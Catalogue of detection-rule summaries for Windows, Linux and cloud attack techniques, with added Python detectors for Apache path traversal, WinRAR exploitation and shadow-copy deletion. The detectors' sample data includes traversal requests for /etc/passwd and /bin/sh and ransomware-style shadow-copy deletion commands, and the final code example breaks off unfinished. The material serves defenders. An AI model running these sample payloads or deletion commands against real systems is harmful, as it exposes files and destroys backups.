    Detects process LSASS memory dump using Mimikatz, NanoDump, Invoke-Mimikatz, Procdump or Taskmgr based on the CallTrace pointing to ntdll.dll, dbghelp.dll or dbgcore.dll for win10, server2016 and up.

  • Credential Dumping Tools Service Execution - Security

    Aug 12, 2024 · attack.credential-access attack.execution attack.t1003.001 attack.t1003.002 attack.t1003.004 attack.t1003.005 attack.t1003.006 attack.t1569.002 attack.s0005

    Detects execution of well-known credential dumping tools via service execution events

  • Credential Dumping Tools Service Execution - System

    Aug 12, 2024 · attack.credential-access attack.execution attack.t1003.001 attack.t1003.002 attack.t1003.004 attack.t1003.005 attack.t1003.006 attack.t1569.002 attack.s0005

    Detects execution of well-known credential dumping tools via service execution events

  • Credential Manager Access By Uncommon Applications

    Aug 12, 2024 · attack.t1003 attack.credential-access

    Detects suspicious processes, based on name and location, that access the Windows Credential Manager and vault, which can be a sign of credential stealing. An example case would be usage of the mimikatz "dpapi::cred" function

  • Credentials from Password Stores - Keychain

    Aug 12, 2024 · attack.credential-access attack.t1555.001

    Detects password dumps from Keychain

  • Credentials In Files

    Aug 12, 2024 · attack.credential-access attack.t1552.001

    Detects attempts to extract passwords with grep and LaZagne

  • Credentials In Files - Linux

    Aug 12, 2024 · attack.credential-access attack.t1552.001

    Detects attempts to extract passwords with grep

  • CredUI.DLL Loaded By Uncommon Process

    Aug 12, 2024 · attack.credential-access attack.collection attack.t1056.002

    Detects loading of "credui.dll" and related DLLs by an uncommon process. Attackers might leverage this DLL for potential use of "CredUIPromptForCredentials" or "CredUnPackAuthenticationBufferW".

  • Critical Hive In Suspicious Location Access Bits Cleared

    Aug 12, 2024 · attack.credential-access attack.t1003.002

    Detects events from the Kernel-General ETW indicating that the access bits of a hive with a system-like hive name located in the temp directory have been reset. This occurs when an application tries to access a hive and the hive has not been recognized in the last 7 days (by default). Registry hive dumping utilities such as QuarksPwDump were seen emitting this behavior.

  • Crontab Enumeration

    Aug 12, 2024 · attack.discovery attack.t1007

    Detects usage of crontab to list the tasks of the user

  • Cross Site Scripting Strings

    Aug 12, 2024 · attack.initial-access attack.t1189

    Detects XSS attempts injected via GET requests in access logs

  • Crypto Miner User Agent

    Aug 12, 2024 · attack.command-and-control attack.t1071.001

    Detects suspicious user agent strings used by crypto miners in proxy logs

  • Csc.EXE Execution From Potentially Suspicious Parent

    Aug 12, 2024 · attack.execution attack.t1059.005 attack.t1059.007 attack.defense-evasion attack.t1218.005 attack.t1027.004

    Detects a potentially suspicious parent of "csc.exe", which could be a sign of payload delivery.

  • Cscript/Wscript Uncommon Script Extension Execution

    Aug 12, 2024 · attack.execution attack.t1059.005 attack.t1059.007

    Detects Wscript/Cscript executing a file with an uncommon (i.e. non-script) extension

  • CSExec Service File Creation

    Aug 12, 2024 · attack.execution attack.t1569.002 attack.s0029

    Detects default CSExec service filename which indicates CSExec service installation and execution

  • CSExec Service Installation

    Aug 12, 2024 · attack.execution attack.t1569.002

    Detects CSExec service installation and execution events

  • Curl Download And Execute Combination

    Aug 12, 2024 · attack.defense-evasion attack.t1218 attack.command-and-control attack.t1105

    Adversaries can use curl to download payloads remotely and execute them. Curl is included by default in Windows 10 build 17063 and later.

  • Curl Usage on Linux

    Aug 12, 2024 · attack.command-and-control attack.t1105

    Detects a curl process start on Linux, which indicates a file download from a remote location or a simple web request to a remote server

  • Curl Web Request With Potential Custom User-Agent

    Aug 12, 2024 · attack.execution

    Detects execution of "curl.exe" with a potential custom "User-Agent". Attackers can leverage this to download or exfiltrate data via "curl" to a domain that only accepts specific "User-Agent" strings

  • CurrentControlSet Autorun Keys Modification

    Aug 12, 2024 · attack.persistence attack.t1547.001

    Detects modification of autostart extensibility point (ASEP) in registry.

  • CurrentVersion Autorun Keys Modification

    Aug 12, 2024 · attack.persistence attack.t1547.001

    Detects modification of autostart extensibility point (ASEP) in registry.

  • CurrentVersion NT Autorun Keys Modification

    Aug 12, 2024 · attack.persistence attack.t1547.001

    Detects modification of autostart extensibility point (ASEP) in registry.

  • Custom File Open Handler Executes PowerShell

    Aug 12, 2024 · attack.defense-evasion attack.t1202

    Detects the abuse of a custom file open handler executing PowerShell

  • CVE-2010-5278 Exploitation Attempt

    Aug 12, 2024 · attack.initial-access attack.t1190 cve.2010-5278 detection.emerging-threats

    MODx manager - Local File Inclusion: Directory traversal vulnerability in manager/controllers/default/resource/tvs.php in MODx Revolution 2.0.2-pl, and possibly earlier, when magic_quotes_gpc is disabled, allows remote attackers to read arbitrary files via a .. (dot dot) in the class_key parameter.

  • CVE-2020-0688 Exchange Exploitation via Web Log

    Aug 12, 2024 · attack.initial-access attack.t1190 cve.2020-0688 detection.emerging-threats

    Detects the exploitation of Microsoft Exchange vulnerability as described in CVE-2020-0688

  • CVE-2020-0688 Exploitation Attempt

    Aug 12, 2024 · attack.initial-access attack.t1190 cve.2020-0688 detection.emerging-threats

    Detects CVE-2020-0688 exploitation attempts

  • CVE-2020-0688 Exploitation via Eventlog

    Aug 12, 2024 · attack.initial-access attack.t1190 cve.2020-0688 detection.emerging-threats

    Detects the exploitation of Microsoft Exchange vulnerability as described in CVE-2020-0688

  • CVE-2020-10148 SolarWinds Orion API Auth Bypass

    Aug 12, 2024 · attack.initial-access attack.t1190 cve.2020-10148 detection.emerging-threats

    Detects CVE-2020-10148 SolarWinds Orion API authentication bypass attempts

  • CVE-2020-1048 Exploitation Attempt - Suspicious New Printer Ports - Registry

    Aug 12, 2024 · attack.persistence attack.execution attack.defense-evasion attack.t1112 cve.2020-1048

    Detects changes to the "Ports" registry key with data that includes a Windows path or a file with a suspicious extension. This could be an attempt to exploit CVE-2020-1048 - a Windows Print Spooler elevation of privilege vulnerability.

  • CVE-2020-5902 F5 BIG-IP Exploitation Attempt

    Aug 12, 2024 · attack.initial-access attack.t1190 cve.2020-5902 detection.emerging-threats

    Detects the exploitation attempt of the vulnerability found in F5 BIG-IP and described in CVE-2020-5902

  • CVE-2021-1675 Print Spooler Exploitation

    Aug 12, 2024 · attack.execution attack.t1569 cve.2021-1675 detection.emerging-threats

    Detects driver load events in the print service operational log that are a sign of successful exploitation attempts against print spooler vulnerability CVE-2021-1675

  • CVE-2021-1675 Print Spooler Exploitation IPC Access

    Aug 12, 2024 · attack.execution attack.t1569 cve.2021-1675 cve.2021-34527 detection.emerging-threats

    Detects remote printer driver loads from Detailed File Share events in Security logs that are a sign of successful exploitation attempts against print spooler vulnerabilities CVE-2021-1675 and CVE-2021-34527

  • CVE-2021-21972 VSphere Exploitation

    Aug 12, 2024 · attack.initial-access attack.t1190 cve.2021-21972 detection.emerging-threats

    Detects the exploitation of VSphere Remote Code Execution vulnerability as described in CVE-2021-21972

  • CVE-2021-21978 Exploitation Attempt

    Aug 12, 2024 · attack.initial-access attack.t1190 cve.2021-21978 detection.emerging-threats

    Detects the exploitation of the VMware View Planner vulnerability described in CVE-2021-21978

  • CVE-2021-26858 Exchange Exploitation

    Aug 12, 2024 · attack.t1203 attack.execution cve.2021-26858 detection.emerging-threats

    Detects possible successful exploitation for vulnerability described in CVE-2021-26858 by looking for creation of non-standard files on disk by Exchange Server's Unified Messaging service which could indicate dropping web shells or other malicious content

  • CVE-2021-31979 CVE-2021-33771 Exploits

    Aug 12, 2024 · attack.credential-access attack.t1566 attack.t1203 cve.2021-33771 cve.2021-31979 detection.emerging-threats

    Detects patterns as noticed in exploitation of Windows CVE-2021-31979 CVE-2021-33771 vulnerability and DevilsTongue malware by threat group Sourgum

  • CVE-2021-31979 CVE-2021-33771 Exploits by Sourgum

    Aug 12, 2024 · attack.credential-access attack.t1566 attack.t1203 cve.2021-33771 cve.2021-31979 detection.emerging-threats

    Detects patterns as noticed in exploitation of Windows CVE-2021-31979 CVE-2021-33771 vulnerability and DevilsTongue malware by threat group Sourgum

  • CVE-2021-33766 Exchange ProxyToken Exploitation

    Aug 12, 2024 · attack.initial-access attack.t1190 cve.2021-33766 detection.emerging-threats

    Detects the exploitation of Microsoft Exchange ProxyToken vulnerability as described in CVE-2021-33766

  • CVE-2021-40539 Zoho ManageEngine ADSelfService Plus Exploit

    Aug 12, 2024 · attack.initial-access attack.t1190 attack.persistence attack.t1505.003 cve.2021-40539 detection.emerging-threats

    Detects an authentication bypass vulnerability affecting the REST API URLs in ADSelfService Plus (CVE-2021-40539).

  • CVE-2021-41773 Exploitation Attempt

    Aug 12, 2024 · attack.initial-access attack.t1190 cve.2021-41773 detection.emerging-threats

    Detects exploitation of a flaw in path normalization in Apache HTTP Server 2.4.49. An attacker could use a path traversal attack to map URLs to files outside the expected document root. If files outside the document root are not protected by "require all denied", these requests can succeed. Additionally, this flaw could leak the source of interpreted files such as CGI scripts. This issue is known to be exploited in the wild. It only affects Apache 2.4.49, not earlier versions.

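    The check described above, as an added example that is not the Sigma rule's own logic: a small Python scanner over Apache access-log lines. It percent-decodes each path segment before walking it (twice, to also catch double-encoded dots), which is exactly the step Apache 2.4.49 got in the wrong order, and reports requests whose encoded ".." segments climb above the document root; a 200 response on such a request means the target was not covered by "require all denied". The log lines, addresses and finding field names are constructed for this example.

```python
import re
from urllib.parse import unquote

# Apache "combined" log format; only the client IP, method, request path and
# status code are used. The regex and the finding fields are this example's own.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+)(?: HTTP/[\d.]+)?" (?P<status>\d{3})'
)

# Constructed sample lines: two CVE-2021-41773 style requests, a literal ".."
# that Apache itself normalises away, and an encoded ".." that stays inside
# the document root.
SAMPLE_LOG = """\
198.51.100.7 - - [05/Oct/2021:12:00:01 +0000] "GET /cgi-bin/.%2e/.%2e/.%2e/.%2e/etc/passwd HTTP/1.1" 200 1326 "-" "curl/7.79.1"
198.51.100.7 - - [05/Oct/2021:12:00:02 +0000] "POST /cgi-bin/%2e%2e/%2e%2e/%2e%2e/%2e%2e/bin/sh HTTP/1.1" 403 199 "-" "curl/7.79.1"
192.0.2.10 - - [05/Oct/2021:12:00:03 +0000] "GET /icons/../index.html HTTP/1.1" 200 3000 "-" "Mozilla/5.0"
192.0.2.11 - - [05/Oct/2021:12:00:04 +0000] "GET /docs/%2e%2e/manual/index.html HTTP/1.1" 200 1200 "-" "Mozilla/5.0"
"""


def classify_request(raw_path: str) -> dict:
    """Walk the path segment by segment, decoding each one first.

    Apache 2.4.49 normalised the path before percent-decoding it, so a
    segment written as '.%2e' or '%2e%2e' was not recognised as '..'.
    Decoding twice also catches '%252e'. 'encoded_dotdot' records whether a
    '..' segment relied on percent-encoding; 'escapes_docroot' whether the
    depth counter ever went below the document root.
    """
    path = raw_path.split('?', 1)[0]
    depth = 0
    encoded_dotdot = False
    escapes = False
    for segment in path.split('/'):
        decoded = unquote(unquote(segment))
        if decoded in ('', '.'):
            continue
        if decoded == '..':
            encoded_dotdot = encoded_dotdot or '%' in segment
            depth -= 1
            escapes = escapes or depth < 0
        else:
            depth += 1
    return {'encoded_dotdot': encoded_dotdot, 'escapes_docroot': escapes}


def scan_log(lines) -> list:
    """Return one finding per request that uses an encoded '..' segment.

    A finding with escapes_docroot=True and served=True is the high-priority
    case: the server answered a request that mapped outside the document
    root, i.e. the path was not protected by "require all denied".
    """
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        verdict = classify_request(m['path'])
        if not verdict['encoded_dotdot']:
            continue
        findings.append({
            'ip': m['ip'],
            'method': m['method'],
            'path': m['path'],
            'status': int(m['status']),
            'escapes_docroot': verdict['escapes_docroot'],
            'served': int(m['status']) == 200,
        })
    return findings


if __name__ == '__main__':
    for finding in scan_log(SAMPLE_LOG.splitlines()):
        print(finding)
```

    A literal "../" never reaches the filesystem on any Apache version, so the scanner only reports requests that needed percent-encoding to express "..", and keeps the in-docroot case as a low-priority finding rather than dropping it.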
  • CVE-2021-44077 POC Default Dropped File

    Aug 12, 2024 · attack.execution cve.2021-44077 detection.emerging-threats

    Detects the creation of "msiexec.exe" in the "bin" directory of ManageEngine SupportCenter Plus, a file dropped by the public proof of concept for CVE-2021-44077 (see the references section of the rule).

  • CVE-2022-24527 Microsoft Connected Cache LPE

    Aug 12, 2024 · attack.privilege-escalation attack.t1059.001 cve.2022-24527 detection.emerging-threats

    Detects files created during local privilege escalation exploitation of CVE-2022-24527 in Microsoft Connected Cache.

  • CVE-2022-31656 VMware Workspace ONE Access Auth Bypass

    Aug 12, 2024 · attack.initial-access attack.t1190 cve.2022-31656 detection.emerging-threats

    Detects exploitation of the VMware Workspace ONE Access authentication bypass vulnerability described in CVE-2022-31656. VMware Workspace ONE Access, Identity Manager and vRealize Automation contain an authentication bypass vulnerability affecting local domain users. A malicious actor with network access to the UI may be able to obtain administrative access without needing to authenticate.

  • CVE-2022-31659 VMware Workspace ONE Access RCE

    Aug 12, 2024 · attack.initial-access attack.t1190 cve.2022-31659 detection.emerging-threats

    Detects possible exploitation of the VMware Workspace ONE Access Admin Remote Code Execution vulnerability described in CVE-2022-31659.

  • CVE-2023-23397 Exploitation Attempt

    Aug 12, 2024 · attack.credential-access attack.initial-access cve.2023-23397 detection.emerging-threats

    Detects Outlook initiating a connection to a WebDAV or SMB share, which could be a sign of CVE-2023-23397 exploitation.

  • CVE-2023-38331 Exploitation Attempt - Suspicious Double Extension File

    Aug 12, 2024 · attack.execution cve.2023-38331 detection.emerging-threats

    Detects the creation by WinRAR of a file whose name carries a double extension separated by a space. This could be a sign of exploitation of the WinRAR vulnerability CVE-2023-38831 (spelled CVE-2023-38331 in the rule title and tags).

  • CVE-2023-40477 Potential Exploitation - .REV File Creation

    Aug 12, 2024 · attack.execution cve.2023-40477 detection.emerging-threats

    Detects the creation of ".rev" files by WinRAR, which could indicate exploitation of CVE-2023-40477. Look for a suspicious execution shortly after creation or a WinRAR application crash.

  • CVE-2023-40477 Potential Exploitation - WinRAR Application Crash

    Aug 12, 2024 · attack.execution cve.2023-40477 detection.emerging-threats

    Detects a crash of "WinRAR.exe" where the application version is lower than 6.23, the release that fixed CVE-2023-40477. Such a crash could indicate an exploitation attempt.

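    The two CVE-2023-40477 rules above (".REV File Creation" and "WinRAR Application Crash") are meant to be read together; as an added example that is not the rules' code, the Python below correlates them: a crash of a WinRAR older than 6.23 becomes a high-confidence alert when WinRAR itself wrote a ".rev" file in the preceding minutes. The event dictionaries mirror a Sysmon file-creation event (Image, TargetFilename) and a Windows Application Error event (AppName, AppVersion) but are constructed here; the correlation window, confidence labels and the non-existent "6.9.0.0" build (included only to show why versions must not be compared as strings) are this example's own.

```python
from datetime import datetime, timedelta

# CVE-2023-40477 was fixed in WinRAR 6.23; anything older is in scope.
FIXED_VERSION = (6, 23)


def parse_version(version: str) -> tuple:
    """'6.22.0.0' -> (6, 22, 0, 0). Compare versions as integer tuples, never
    as strings: as strings '6.9.0.0' sorts *after* '6.23' and would be missed."""
    parts = []
    for part in version.split('.'):
        digits = ''.join(ch for ch in part if ch.isdigit())
        parts.append(int(digits) if digits else 0)
    return tuple(parts)


def is_winrar(image: str) -> bool:
    """Match on the file name only; the install path varies."""
    return image.replace('/', '\\').rsplit('\\', 1)[-1].lower() == 'winrar.exe'


def is_vulnerable_winrar_crash(event: dict) -> bool:
    return (event['kind'] == 'app_error'
            and is_winrar(event['AppName'])
            and parse_version(event['AppVersion']) < FIXED_VERSION)


def is_rev_creation_by_winrar(event: dict) -> bool:
    return (event['kind'] == 'file_create'
            and is_winrar(event['Image'])
            and event['TargetFilename'].lower().endswith('.rev'))


def correlate(events, window: timedelta = timedelta(minutes=2)) -> list:
    """One alert per crash of a vulnerable WinRAR; confidence rises to 'high'
    when WinRAR itself wrote a .rev file in the preceding window."""
    rev_writes = [(e['UtcTime'], e['TargetFilename'])
                  for e in events if is_rev_creation_by_winrar(e)]
    alerts = []
    for e in events:
        if not is_vulnerable_winrar_crash(e):
            continue
        preceding = [name for t, name in rev_writes
                     if e['UtcTime'] - window <= t <= e['UtcTime']]
        alerts.append({
            'time': e['UtcTime'],
            'version': e['AppVersion'],
            'rev_files': preceding,
            'confidence': 'high' if preceding else 'medium',
        })
    return alerts


# Constructed sample telemetry. 'file_create' mirrors a Sysmon file-creation
# event (Image, TargetFilename); 'app_error' mirrors an Application Error
# event (AppName, AppVersion). The 6.9.0.0 entry is invented to exercise the
# version comparison, not a real WinRAR release.
T0 = datetime(2023, 8, 20, 10, 0, 0)
SAMPLE_EVENTS = [
    {'kind': 'file_create', 'UtcTime': T0, 'Image': r'C:\Program Files\WinRAR\WinRAR.exe',
     'TargetFilename': r'C:\Users\alice\Downloads\invoice.part1.rev'},
    {'kind': 'app_error', 'UtcTime': T0 + timedelta(seconds=40),
     'AppName': 'WinRAR.exe', 'AppVersion': '6.22.0.0'},
    {'kind': 'app_error', 'UtcTime': T0 + timedelta(hours=1),
     'AppName': 'WinRAR.exe', 'AppVersion': '6.23.0.0'},
    {'kind': 'app_error', 'UtcTime': T0 + timedelta(hours=2),
     'AppName': 'WinRAR.exe', 'AppVersion': '6.9.0.0'},
    {'kind': 'file_create', 'UtcTime': T0 + timedelta(hours=3), 'Image': r'C:\Windows\explorer.exe',
     'TargetFilename': r'C:\tmp\other.rev'},
]

if __name__ == '__main__':
    for alert in correlate(SAMPLE_EVENTS):
        print(alert)
```

    The crash on 6.23.0.0 is dropped because the tuple comparison treats it as patched, while the crash on the invented 6.9.0.0 build is still reported; a string comparison would have inverted both decisions.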
  • DarkSide Ransomware Pattern

    Aug 12, 2024 · attack.execution attack.t1204 detection.emerging-threats

    Detects DarkSide ransomware and its helpers.

  • Data Compressed

    Aug 12, 2024 · attack.exfiltration attack.t1560.001

    Detects compression of collected data. An adversary may compress data (e.g., sensitive documents) collected prior to exfiltration in order to make it portable and minimize the amount of data sent over the network.

  • Data Copied To Clipboard Via Clip.EXE

    Aug 12, 2024 · attack.collection attack.t1115

    Detects the execution of clip.exe in order to copy data to the clipboard. Adversaries may collect data stored in the clipboard from users copying information within or between applications.

  • Data Exfiltration to Unsanctioned Apps

    Aug 12, 2024 · attack.exfiltration attack.t1537

    Detects when Microsoft Cloud App Security reports that a user or IP address used an unsanctioned app to perform an activity that resembles an attempt to exfiltrate information from your organization.

  • Data Exfiltration with Wget

    Aug 12, 2024 · attack.exfiltration attack.t1048.003

    Detects attempts to POST a file using the wget utility. An adversary can bypass permission restrictions through a misconfigured sudo entry for wget, which could allow them to read files such as /etc/shadow.

  • DCERPC SMB Spoolss Named Pipe

    Aug 12, 2024 · attack.lateral-movement attack.t1021.002

    Detects the use of the spoolss named pipe over SMB. This can be used to coerce NTLM authentication from any machine that has the Print Spooler service enabled.

  • DCOM InternetExplorer.Application Iertutil DLL Hijack - Security

    Aug 12, 2024 · attack.lateral-movement attack.t1021.002 attack.t1021.003

    Detects a threat actor creating a file named iertutil.dll in the C:\Program Files\Internet Explorer\ directory over the network for a DCOM InternetExplorer DLL hijack scenario.

  • DD File Overwrite

    Aug 12, 2024 · attack.impact attack.t1485

    Detects potential overwriting and deletion of a file using dd.

  • Decode Base64 Encoded Text

    Aug 12, 2024 · attack.defense-evasion attack.t1027

    Detects usage of the base64 utility to decode arbitrary base64-encoded text.

  • Decode Base64 Encoded Text -MacOs

    Aug 12, 2024 · attack.defense-evasion attack.t1027

    Detects usage of the base64 utility to decode arbitrary base64-encoded text.

  • Default Cobalt Strike Certificate

    Aug 12, 2024 · attack.command-and-control attack.s0154

    Detects the presence of the default Cobalt Strike certificate in HTTPS traffic.

  • Default Credentials Usage

    Aug 12, 2024 · attack.initial-access

    Detects default credential usage as reported by the Qualys vulnerability scanner (scan type: Vulnerability Management). Before deploying any new asset, change all default passwords to values consistent with administrative-level accounts.

  • Default RDP Port Changed to Non Standard Port

    Aug 12, 2024 · attack.persistence attack.t1547.010

    Detects changes to the default RDP port. Remote desktop is a common feature in operating systems. It allows a user to log into a remote system using an interactive session with a graphical user interface. Microsoft refers to its implementation of the Remote Desktop Protocol (RDP) as Remote Desktop Services (RDS).

  • Defrag Deactivation

    Aug 12, 2024 · attack.persistence attack.t1053.005 attack.s0111 detection.emerging-threats

    Detects the deactivation and disabling of the scheduled defragmentation task, as seen used by the Slingshot APT group.

  • Defrag Deactivation - Security

    Aug 12, 2024 · attack.persistence attack.t1053 attack.s0111 detection.emerging-threats

    Detects the deactivation and disabling of the scheduled defragmentation task, as seen used by the Slingshot APT group.

  • Delegated Permissions Granted For All Users

    Aug 12, 2024 · attack.credential-access attack.t1528

    Detects when highly privileged delegated permissions are granted on behalf of all users.

  • Delete All Scheduled Tasks

    Aug 12, 2024 · attack.impact attack.t1489

    Detects the usage of schtasks with the delete flag and the asterisk symbol to delete all tasks from the schedule of the local computer, including tasks scheduled by other users.

  • Delete Important Scheduled Task

    Aug 12, 2024 · attack.impact attack.t1489

    Detects when adversaries stop services or processes by deleting their respective scheduled tasks in order to conduct data destructive activities.

  • Delete Volume Shadow Copies Via WMI With PowerShell

    Aug 12, 2024 · attack.impact attack.t1490

    Detects deletion of Volume Shadow Copies using operating system utilities via PowerShell.

  • Delete Volume Shadow Copies via WMI with PowerShell - PS Script

    Aug 12, 2024 · attack.impact attack.t1490

    Detects deletion of Windows Volume Shadow Copies with PowerShell code and Get-WMIObject. This technique is used by numerous ransomware families such as Sodinokibi/REvil.

  • Deleted Data Overwritten Via Cipher.EXE

    Aug 12, 2024 · attack.impact attack.t1485

    Detects usage of the "cipher" built-in utility in order to overwrite deleted data on disk. Adversaries may destroy data and files on specific systems or in large numbers on a network to interrupt availability to systems, services, and network resources. Data destruction is likely to render stored data irrecoverable by forensic techniques through overwriting files or data on local and remote drives.

  • Deletion of Volume Shadow Copies via WMI with PowerShell

    Aug 12, 2024 · attack.impact attack.t1490

    Detects deletion of Windows Volume Shadow Copies with PowerShell code and Get-WMIObject. This technique is used by numerous ransomware families such as Sodinokibi/REvil.

  • Deletion of Volume Shadow Copies via WMI with PowerShell - PS Script

    Aug 12, 2024 · attack.impact attack.t1490

    Detects deletion of Windows Volume Shadow Copies with PowerShell code and Get-WMIObject. This technique is used by numerous ransomware families such as Sodinokibi/REvil.

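    The four shadow-copy rules above all look for the same PowerShell pattern: enumerate Win32_ShadowCopy through WMI, then delete what comes back. As an added example that is not the rules' own logic, the Python below applies that pattern to PowerShell script-block text (Event ID 4104). It accepts the built-in aliases (gwmi, rwmi), both deletion styles (piping to Remove-WmiObject or calling .Delete() on each instance) and strips backtick escapes that attackers insert to break string matching. Matching the CIM cmdlets (Get-CimInstance/Remove-CimInstance and their gcim/rcim aliases) goes beyond what the rules name and is this example's own generalisation; the event records are constructed.

```python
import re

# Cmdlets and their built-in aliases. The CIM cmdlets are an addition beyond
# the WMI-only rules above: they reach the same Win32_ShadowCopy class.
GET_INSTANCE = re.compile(r'\b(get-wmiobject|gwmi|get-ciminstance|gcim)\b', re.I)
SHADOW_CLASS = re.compile(r'\bwin32_shadowcopy\b', re.I)
DELETE_CALL = re.compile(r'\b(remove-wmiobject|rwmi|remove-ciminstance|rcim)\b'
                         r'|\.delete\s*\(\s*\)', re.I)


def normalise(script: str) -> str:
    """Undo the cheap obfuscations that keep a script block from matching:
    backtick escapes inside tokens ("Win32_Sh`adowCopy") and runs of
    whitespace."""
    return re.sub(r'\s+', ' ', script.replace('`', ''))


def is_shadow_copy_deletion(script_block: str) -> bool:
    """True when the block enumerates Win32_ShadowCopy and deletes the result,
    either by piping to Remove-WmiObject/Remove-CimInstance or by calling
    .Delete() on each instance. Enumeration alone does not match."""
    text = normalise(script_block)
    return bool(GET_INSTANCE.search(text)
                and SHADOW_CLASS.search(text)
                and DELETE_CALL.search(text))


def scan_script_blocks(events) -> list:
    """Return the ScriptBlockIds of Event ID 4104 records that match."""
    return [e['ScriptBlockId'] for e in events
            if is_shadow_copy_deletion(e['ScriptBlockText'])]


# Constructed Event ID 4104 style records: the classic REvil one-liner, the
# alias form, enumeration only, a WMI deletion of something else, a
# backtick-obfuscated variant and the CIM equivalent.
SAMPLE_EVENTS = [
    {'ScriptBlockId': 'a1', 'ScriptBlockText':
        'Get-WmiObject Win32_Shadowcopy | ForEach-Object {$_.Delete();}'},
    {'ScriptBlockId': 'a2', 'ScriptBlockText':
        'gwmi -Class Win32_ShadowCopy | Remove-WmiObject'},
    {'ScriptBlockId': 'a3', 'ScriptBlockText':
        'Get-WmiObject Win32_ShadowCopy | Select-Object ID, InstallDate'},
    {'ScriptBlockId': 'a4', 'ScriptBlockText':
        'Get-WmiObject Win32_Service -Filter "Name=\'Spooler\'" | Remove-WmiObject'},
    {'ScriptBlockId': 'a5', 'ScriptBlockText':
        'G`et-WmiOb`ject   Win32_Sh`adowCopy | % { $_.De`lete() }'},
    {'ScriptBlockId': 'a6', 'ScriptBlockText':
        'Get-CimInstance -ClassName Win32_ShadowCopy | Remove-CimInstance'},
]

if __name__ == '__main__':
    print(scan_script_blocks(SAMPLE_EVENTS))
```

    Requiring all three parts (enumeration, the shadow-copy class, a delete) keeps backup-inventory scripts that only list shadow copies out of the alert, which is the main false-positive source for this pattern.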
  • Denied Access To Remote Desktop

    Aug 12, 2024 · attack.lateral-movement attack.t1021.001

    This event is generated when an authenticated user who is not allowed to log on remotely attempts to connect to this computer through Remote Desktop. Attackers often generate this event when searching for available Windows servers in the network.

  • Deny Service Access Using Security Descriptor Tampering Via Sc.EXE

    Aug 12, 2024 · attack.persistence attack.t1543.003

    Detects suspicious DACL modifications to deny access to a service that affect critical trustees. This can be used to hide services or make them unstoppable.

  • Deployment AppX Package Was Blocked By AppLocker

    Aug 12, 2024 · attack.defense-evasion

    Detects an AppX package deployment that was blocked by AppLocker policy.

  • Deployment Of The AppX Package Was Blocked By The Policy

    Aug 12, 2024 · attack.defense-evasion

    Detects an AppX package deployment that was blocked by the local computer policy.

  • Detect Virtualbox Driver Installation OR Starting Of VMs

    Aug 12, 2024 · attack.defense-evasion attack.t1564.006 attack.t1564

    Adversaries can carry out malicious operations using a virtual instance to avoid detection. This rule detects the registration of the VirtualBox driver or the start of a VirtualBox VM.

  • Detected Windows Software Discovery

    Aug 12, 2024 · attack.discovery attack.t1518

    Adversaries may attempt to enumerate software for a variety of reasons, such as figuring out what security measures are present or whether the compromised system has a version of software that is vulnerable.

  • Detected Windows Software Discovery - PowerShell

    Aug 12, 2024 · attack.discovery attack.t1518

    Adversaries may attempt to enumerate software for a variety of reasons, such as figuring out what security measures are present or whether the compromised system has a version of software that is vulnerable.

  • Detection of PowerShell Execution via Sqlps.exe

    Aug 12, 2024 · attack.execution attack.t1059.001 attack.defense-evasion attack.t1127

    Detects execution of PowerShell code through the sqlps.exe utility, which ships with Microsoft SQL Server. Script blocks are not logged in this case, so the utility can be used to bypass protection mechanisms that rely on analysis of script block logs.

  • Device Installation Blocked

    Aug 12, 2024 · attack.initial-access attack.t1200

    Detects an installation of a device that is forbidden by the system policy.

  • Device Registration or Join Without MFA

    Aug 12, 2024 · attack.defense-evasion attack.t1078.004

    Monitor and alert for device registration or join events where MFA was not performed.

  • DeviceCredentialDeployment Execution

    Aug 12, 2024 · attack.defense-evasion attack.t1218

    Detects the execution of DeviceCredentialDeployment to hide a process from view.

  • Devil Bait Potential C2 Communication Traffic

    Aug 12, 2024 · attack.command-and-control detection.emerging-threats

    Detects potential C2 communication related to Devil Bait malware.

  • Devtoolslauncher.exe Executes Specified Binary

    Aug 12, 2024 · attack.defense-evasion attack.t1218

    Detects Devtoolslauncher.exe being used to execute another binary.

  • DEWMODE Webshell Access

    Aug 12, 2024 · attack.persistence attack.t1505.003 detection.emerging-threats

    Detects access to the DEWMODE webshell as described in the FireEye report.

  • Diagnostic Library Sdiageng.DLL Loaded By Msdt.EXE

    Aug 12, 2024 · attack.defense-evasion attack.t1202 cve.2022-30190

    Detects exploitation of both CVE-2022-30190 (Follina) and the DogWalk vulnerability, in which the msdt.exe binary is made to load the "sdiageng.dll" library.

  • DiagTrackEoP Default Login Username

    Aug 12, 2024 · attack.privilege-escalation

    Detects the default "UserName" used by the DiagTrackEoP POC.

  • Directory Removal Via Rmdir

    Aug 12, 2024 · attack.defense-evasion attack.t1070.004

    Detects execution of the built-in "rmdir" command in order to delete directories. Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary may leave traces that indicate what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.

  • Directory Service Restore Mode(DSRM) Registry Value Tampering

    Aug 12, 2024 · attack.persistence attack.t1556

    Detects changes to the "DsrmAdminLogonBehavior" registry value. During a Domain Controller (DC) promotion, administrators create a Directory Services Restore Mode (DSRM) local administrator account with a password that rarely changes. The DSRM account is an "Administrator" account used to log on when the server boots into DSRM to restore AD backups or recover the server from a failure. Attackers could abuse the DSRM account to maintain persistence and access to the organization's Active Directory. If the "DsrmAdminLogonBehavior" value is set to "0", the administrator account can only be used if the DC starts in DSRM. If it is set to "1", the account can only be used if the local AD DS service is stopped. If it is set to "2", the account can always be used.

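    The three values described above map directly onto alert severity; as an added example that is not the rule's code, the Python below classifies Sysmon Event ID 13 (registry value set) records for writes to DsrmAdminLogonBehavior. The field names (EventType, TargetObject, Details, Image) and the "DWORD (0x00000002)" data format are Sysmon's; the severity mapping, the handling of non-DWORD writes and the sample events are this example's own.

```python
import re

# Registry value named in the rule; Sysmon reports the hive as "HKLM\...".
# Compare case-insensitively on the path suffix.
DSRM_SUFFIX = r'\control\lsa\dsrmadminlogonbehavior'
# Sysmon renders DWORD data as "DWORD (0x00000002)".
DWORD_RE = re.compile(r'DWORD \((0x[0-9A-Fa-f]{8})\)')

# Value semantics as described in the rule; the severity mapping is this
# example's own.
MEANING = {
    0: 'DSRM administrator usable only when the DC boots into DSRM',
    1: 'DSRM administrator usable whenever AD DS is stopped',
    2: 'DSRM administrator always usable',
}
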